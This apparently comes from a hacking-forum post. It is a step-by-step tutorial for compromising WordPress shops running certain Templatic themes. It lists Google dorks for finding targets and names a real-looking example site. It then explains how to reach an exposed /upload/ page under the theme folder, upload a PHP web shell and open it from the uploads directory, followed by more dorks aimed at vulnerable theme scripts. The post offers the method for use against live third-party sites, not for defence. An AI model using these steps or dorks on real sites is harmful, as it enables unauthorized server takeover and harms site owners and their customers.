WordPress Themes Vulnerable

WordPress Themes Vulnerable

WordPress Themes Vulnerable to this Exploit:


Quote:WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
Tutorial
1. Go to google and search this dork:
Quote:"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
2. Click on any Website

Example:
http://shopshack.net

Right Click and click view page source:
[Image: YjYzrlb.jpg] 


3. Locate theme within source code.
[Image: 8I2RiEH.jpg]
Which is:
Quote:http://shopshack.net/wp-content/themes/framework/

Notice that the theme is /framework/

We now have found a vulnerable theme to test exploit.



4. Next, add /upload/ to the end of the URL after /framework/
[Image: GEC6WVM.jpg] 


5. Use the Uploader to upload your shell. (Supports: .php .txt .html)


Shell Acces:
Quote:/wp-content/uploads/products_img/SHELL-NAME-HERE.php
Example:
Quote:http://shopshack.net/wp-content/uploads/...mg/dir.php
Another Google DorK:

Quote:inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Credits: HackForums Heart